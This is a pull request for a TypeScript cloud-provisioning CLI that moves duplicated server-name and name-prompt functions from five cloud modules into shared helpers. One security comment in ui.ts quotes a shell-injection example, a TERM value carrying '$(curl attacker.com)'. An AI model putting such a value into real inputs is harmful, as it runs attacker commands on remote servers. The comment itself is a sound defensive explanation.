### PR TITLE
refactor: Deduplicate getServerName and promptSpawnName across cloud modules

### DIFF
--- a/packages/cli/package.json
+++ b/packages/cli/package.json
@@ -1,6 +1,6 @@
 {
   "name": "@openrouter/spawn",
-  "version": "0.15.32",
+  "version": "0.15.33",
   "type": "module",
   "bin": {
     "spawn": "cli.js"

--- a/packages/cli/src/aws/aws.ts
+++ b/packages/cli/src/aws/aws.ts
@@ -20,7 +20,7 @@ import {
 import { ensureSshKeys, getSshKeyOpts } from "../shared/ssh-keys";
 import { getErrorMessage } from "../shared/type-guards";
 import {
-  defaultSpawnName,
+  getServerNameFromEnv,
   getSpawnCloudConfigPath,
   jsonEscape,
   logError,
@@ -30,11 +30,10 @@ import {
   logStepInline,
   logWarn,
   prompt,
+  promptSpawnNameShared,
   sanitizeTermValue,
   selectFromList,
-  toKebabCase,
   validateRegionName,
-  validateServerName,
 } from "../shared/ui";
 
 const DASHBOARD_URL = "https://lightsail.aws.amazon.com/";
@@ -1202,39 +1201,11 @@ export async function interactiveSession(cmd: string): Promise<number> {
 // ─── Server Name ────────────────────────────────────────────────────────────
 
 export async function getServerName(): Promise<string> {
-  if (process.env.LIGHTSAIL_SERVER_NAME) {
-    const name = process.env.LIGHTSAIL_SERVER_NAME;
-    if (!validateServerName(name)) {
-      logError(`Invalid LIGHTSAIL_SERVER_NAME: '${name}'`);
-      throw new Error("Invalid server name");
-    }
-    logInfo(`Using instance name from environment: ${name}`);
-    return name;
-  }
-
-  const kebab = process.env.SPAWN_NAME_KEBAB || (process.env.SPAWN_NAME ? toKebabCase(process.env.SPAWN_NAME) : "");
-  return kebab || defaultSpawnName();
+  return getServerNameFromEnv("LIGHTSAIL_SERVER_NAME");
 }
 
 export async function promptSpawnName(): Promise<void> {
-  if (process.env.SPAWN_NAME_KEBAB) {
-    return;
-  }
-
-  let kebab: string;
-  if (process.env.SPAWN_NON_INTERACTIVE === "1") {
-    kebab = (process.env.SPAWN_NAME ? toKebabCase(process.env.SPAWN_NAME) : "") || defaultSpawnName();
-  } else {
-    const derived = process.env.SPAWN_NAME ? toKebabCase(process.env.SPAWN_NAME) : "";
-    const fallback = derived || defaultSpawnName();
-    process.stderr.write("\n");
-    const answer = await prompt(`AWS instance name [${fallback}]: `);
-    kebab = toKebabCase(answer || fallback) || defaultSpawnName();
-  }
-
-  process.env.SPAWN_NAME_DISPLAY = kebab;
-  process.env.SPAWN_NAME_KEBAB = kebab;
-  logInfo(`Using resource name: ${kebab}`);
+  return promptSpawnNameShared("AWS instance");
 }
 
 // ─── Lifecycle ──────────────────────────────────────────────────────────────

--- a/packages/cli/src/digitalocean/digitalocean.ts
+++ b/packages/cli/src/digitalocean/digitalocean.ts
@@ -20,6 +20,7 @@ import { ensureSshKeys, getSshFingerprint, getSshKeyOpts } from "../shared/ssh-k
 import { getErrorMessage, isNumber, isString, toObjectArray, toRecord } from "../shared/type-guards";
 import {
   defaultSpawnName,
+  getServerNameFromEnv,
   getSpawnCloudConfigPath,
   loadApiToken,
   logError,
@@ -1209,18 +1210,7 @@ export async function interactiveSession(cmd: string, ip?: string): Promise<numb
 // ─── Server Name ─────────────────────────────────────────────────────────────
 
 export async function getServerName(): Promise<string> {
-  if (process.env.DO_DROPLET_NAME) {
-    const name = process.env.DO_DROPLET_NAME;
-    if (!validateServerName(name)) {
-      logError(`Invalid DO_DROPLET_NAME: '${name}'`);
-      throw new Error("Invalid server name");
-    }
-    logInfo(`Using droplet name from environment: ${name}`);
-    return name;
-  }
-
-  const kebab = process.env.SPAWN_NAME_KEBAB || (process.env.SPAWN_NAME ? toKebabCase(process.env.SPAWN_NAME) : "");
-  return kebab || defaultSpawnName();
+  return getServerNameFromEnv("DO_DROPLET_NAME");
 }
 
 export async function promptSpawnName(): Promise<void> {

--- a/packages/cli/src/gcp/gcp.ts
+++ b/packages/cli/src/gcp/gcp.ts
@@ -18,7 +18,7 @@ import {
 } from "../shared/ssh";
 import { ensureSshKeys, getSshKeyOpts } from "../shared/ssh-keys";
 import {
-  defaultSpawnName,
+  getServerNameFromEnv,
   logError,
   logInfo,
   logStep,
@@ -26,10 +26,9 @@ import {
   logStepInline,
   logWarn,
   prompt,
+  promptSpawnNameShared,
   sanitizeTermValue,
   selectFromList,
-  toKebabCase,
-  validateServerName,
 } from "../shared/ui";
 
 const DASHBOARD_URL = "https://console.cloud.google.com/compute/instances";
@@ -644,39 +643,11 @@ function resolveUsername(): string {
 // ─── Server Name ────────────────────────────────────────────────────────────
 
 export async function getServerName(): Promise<string> {
-  if (process.env.GCP_INSTANCE_NAME) {
-    const name = process.env.GCP_INSTANCE_NAME;
-    if (!validateServerName(name)) {
-      logError(`Invalid GCP_INSTANCE_NAME: '${name}'`);
-      throw new Error("Invalid server name");
-    }
-    logInfo(`Using instance name from environment: ${name}`);
-    return name;
-  }
-
-  const kebab = process.env.SPAWN_NAME_KEBAB || (process.env.SPAWN_NAME ? toKebabCase(process.env.SPAWN_NAME) : "");
-  return kebab || defaultSpawnName();
+  return getServerNameFromEnv("GCP_INSTANCE_NAME");
 }
 
 export async function promptSpawnName(): Promise<void> {
-  if (process.env.SPAWN_NAME_KEBAB) {
-    return;
-  }
-
-  let kebab: string;
-  if (process.env.SPAWN_NON_INTERACTIVE === "1") {
-    kebab = (process.env.SPAWN_NAME ? toKebabCase(process.env.SPAWN_NAME) : "") || defaultSpawnName();
-  } else {
-    const derived = process.env.SPAWN_NAME ? toKebabCase(process.env.SPAWN_NAME) : "";
-    const fallback = derived || defaultSpawnName();
-    process.stderr.write("\n");
-    const answer = await prompt(`GCP instance name [${fallback}]: `);
-    kebab = toKebabCase(answer || fallback) || defaultSpawnName();
-  }
-
-  process.env.SPAWN_NAME_DISPLAY = kebab;
-  process.env.SPAWN_NAME_KEBAB = kebab;
-  logInfo(`Using resource name: ${kebab}`);
+  return promptSpawnNameShared("GCP instance");
 }
 
 // ─── Cloud Init Startup Script ──────────────────────────────────────────────

--- a/packages/cli/src/hetzner/hetzner.ts
+++ b/packages/cli/src/hetzner/hetzner.ts
@@ -18,7 +18,7 @@ import {
 import { ensureSshKeys, getSshFingerprint, getSshKeyOpts } from "../shared/ssh-keys";
 import { getErrorMessage, isNumber, isString, toObjectArray, toRecord } from "../shared/type-guards";
 import {
-  defaultSpawnName,
+  getServerNameFromEnv,
   getSpawnCloudConfigPath,
   jsonEscape,
   loadApiToken,
@@ -29,11 +29,10 @@ import {
   logStepInline,
   logWarn,
   prompt,
+  promptSpawnNameShared,
   sanitizeTermValue,
   selectFromList,
-  toKebabCase,
   validateRegionName,
-  validateServerName,
 } from "../shared/ui";
 
 const HETZNER_API_BASE = "https://api.hetzner.cloud/v1";
@@ -654,39 +653,11 @@ export async function interactiveSession(cmd: string, ip?: string): Promise<numb
 // ─── Server Name ─────────────────────────────────────────────────────────────
 
 export async function getServerName(): Promise<string> {
-  if (process.env.HETZNER_SERVER_NAME) {
-    const name = process.env.HETZNER_SERVER_NAME;
-    if (!validateServerName(name)) {
-      logError(`Invalid HETZNER_SERVER_NAME: '${name}'`);
-      throw new Error("Invalid server name");
-    }
-    logInfo(`Using server name from environment: ${name}`);
-    return name;
-  }
-
-  const kebab = process.env.SPAWN_NAME_KEBAB || (process.env.SPAWN_NAME ? toKebabCase(process.env.SPAWN_NAME) : "");
-  return kebab || defaultSpawnName();
+  return getServerNameFromEnv("HETZNER_SERVER_NAME");
 }
 
 export async function promptSpawnName(): Promise<void> {
-  if (process.env.SPAWN_NAME_KEBAB) {
-    return;
-  }
-
-  let kebab: string;
-  if (process.env.SPAWN_NON_INTERACTIVE === "1") {
-    kebab = (process.env.SPAWN_NAME ? toKebabCase(process.env.SPAWN_NAME) : "") || defaultSpawnName();
-  } else {
-    const derived = process.env.SPAWN_NAME ? toKebabCase(process.env.SPAWN_NAME) : "";
-    const fallback = derived || defaultSpawnName();
-    process.stderr.write("\n");
-    const answer = await prompt(`Hetzner server name [${fallback}]: `);
-    kebab = toKebabCase(answer || fallback) || defaultSpawnName();
-  }
-
-  process.env.SPAWN_NAME_DISPLAY = kebab;
-  process.env.SPAWN_NAME_KEBAB = kebab;
-  logInfo(`Using resource name: ${kebab}`);
+  return promptSpawnNameShared("Hetzner server");
 }
 
 // ─── Lifecycle ───────────────────────────────────────────────────────────────

--- a/packages/cli/src/shared/ui.ts
+++ b/packages/cli/src/shared/ui.ts
@@ -295,6 +295,52 @@ export function defaultSpawnName(): string {
   return `spawn-${suffix}`;
 }
 
+/**
+ * Get server name from a cloud-specific env var, falling back to SPAWN_NAME_KEBAB / defaultSpawnName.
+ * Every cloud module had an identical copy of this logic — now unified here.
+ */
+export function getServerNameFromEnv(cloudEnvVar: string): string {
+  const cloudName = process.env[cloudEnvVar];
+  if (cloudName) {
+    if (!validateServerName(cloudName)) {
+      logError(`Invalid ${cloudEnvVar}: '${cloudName}'`);
+      throw new Error("Invalid server name");
+    }
+    logInfo(`Using server name from environment: ${cloudName}`);
+    return cloudName;
+  }
+
+  const kebab = process.env.SPAWN_NAME_KEBAB || (process.env.SPAWN_NAME ? toKebabCase(process.env.SPAWN_NAME) : "");
+  return kebab || defaultSpawnName();
+}
+
+/**
+ * Prompt user for a spawn name (or derive it non-interactively).
+ * Every cloud module had an identical copy of this logic — now unified here.
+ *
+ * @param cloudLabel - Display label for the prompt (e.g. "AWS instance", "Hetzner server")
+ */
+export async function promptSpawnNameShared(cloudLabel: string): Promise<void> {
+  if (process.env.SPAWN_NAME_KEBAB) {
+    return;
+  }
+
+  let kebab: string;
+  if (process.env.SPAWN_NON_INTERACTIVE === "1") {
+    kebab = (process.env.SPAWN_NAME ? toKebabCase(process.env.SPAWN_NAME) : "") || defaultSpawnName();
+  } else {
+    const derived = process.env.SPAWN_NAME ? toKebabCase(process.env.SPAWN_NAME) : "";
+    const fallback = derived || defaultSpawnName();
+    process.stderr.write("\n");
+    const answer = await prompt(`${cloudLabel} name [${fallback}]: `);
+    kebab = toKebabCase(answer || fallback) || defaultSpawnName();
+  }
+
+  process.env.SPAWN_NAME_DISPLAY = kebab;
+  process.env.SPAWN_NAME_KEBAB = kebab;
+  logInfo(`Using resource name: ${kebab}`);
+}
+
 /** Sanitize TERM value before interpolating into shell commands.
  *  SECURITY: Prevents shell injection via malicious TERM env vars
  *  (e.g., TERM='$(curl attacker.com)' would execute on the remote server). */

--- a/packages/cli/src/sprite/sprite.ts
+++ b/packages/cli/src/sprite/sprite.ts
@@ -8,16 +8,14 @@ import { join } from "node:path";
 import { killWithTimeout, sleep, spawnInteractive } from "../shared/ssh";
 import { getErrorMessage } from "../shared/type-guards";
 import {
-  defaultSpawnName,
+  getServerNameFromEnv,
   logError,
   logInfo,
   logStep,
   logStepDone,
   logStepInline,
   logWarn,
-  prompt,
-  toKebabCase,
-  validateServerName,
+  promptSpawnNameShared,
 } from "../shared/ui";
 
 // ─── Configurable Constants ──────────────────────────────────────────────────
@@ -261,39 +259,11 @@ function orgFlags(): string[] {
 // ─── Server Name ─────────────────────────────────────────────────────────────
 
 export async function promptSpawnName(): Promise<void> {
-  if (process.env.SPAWN_NAME_KEBAB) {
-    return;
-  }
-
-  let kebab: string;
-  if (process.env.SPAWN_NON_INTERACTIVE === "1") {
-    kebab = (process.env.SPAWN_NAME ? toKebabCase(process.env.SPAWN_NAME) : "") || defaultSpawnName();
-  } else {
-    const derived = process.env.SPAWN_NAME ? toKebabCase(process.env.SPAWN_NAME) : "";
-    const fallback = derived || defaultSpawnName();
-    process.stderr.write("\n");
-    const answer = await prompt(`Sprite name [${fallback}]: `);
-    kebab = toKebabCase(answer || fallback) || defaultSpawnName();
-  }
-
-  process.env.SPAWN_NAME_DISPLAY = kebab;
-  process.env.SPAWN_NAME_KEBAB = kebab;
-  logInfo(`Using resource name: ${kebab}`);
+  return promptSpawnNameShared("Sprite");
 }
 
 export async function getServerName(): Promise<string> {
-  if (process.env.SPRITE_NAME) {
-    const name = process.env.SPRITE_NAME;
-    if (!validateServerName(name)) {
-      logError(`Invalid SPRITE_NAME: '${name}'`);
-      throw new Error("Invalid server name");
-    }
-    logInfo(`Using sprite name from environment: ${name}`);
-    return name;
-  }
-
-  const kebab = process.env.SPAWN_NAME_KEBAB || (process.env.SPAWN_NAME ? toKebabCase(process.env.SPAWN_NAME) : "");
-  return kebab || defaultSpawnName();
+  return getServerNameFromEnv("SPRITE_NAME");
 }
 
 // ─── Provisioning ────────────────────────────────────────────────────────────


### PR DESCRIPTION
## Summary

- Extract `getServerNameFromEnv()` and `promptSpawnNameShared()` into `packages/cli/src/shared/ui.ts`
- Replace near-identical implementations in AWS, Hetzner, GCP, DigitalOcean, and Sprite cloud modules
- DigitalOcean retains its custom `promptSpawnName` (has extra `DO_DROPLET_NAME` pre-check logic) but uses the shared `getServerNameFromEnv`
- Net reduction: ~80 lines of duplicated code removed
- Bump CLI version to 0.15.33

## Scan results

| Category | Findings |
|---|---|
| Dead code (shell) | None — all functions in `sh/shared/*.sh` are called |
| Dead code (TypeScript) | None — all shared exports have importers |
| Python usage | None found |
| Duplicate utilities | **getServerName** and **promptSpawnName** duplicated across 5 cloud modules (fixed) |
| Stale references | None — no references to removed functions/files |
| Stale comments | None significant |

## Test plan

- [x] `bunx @biomejs/biome check src/` — 0 errors
- [x] `bun test` — 1465 tests pass, 0 failures

-- qa/code-quality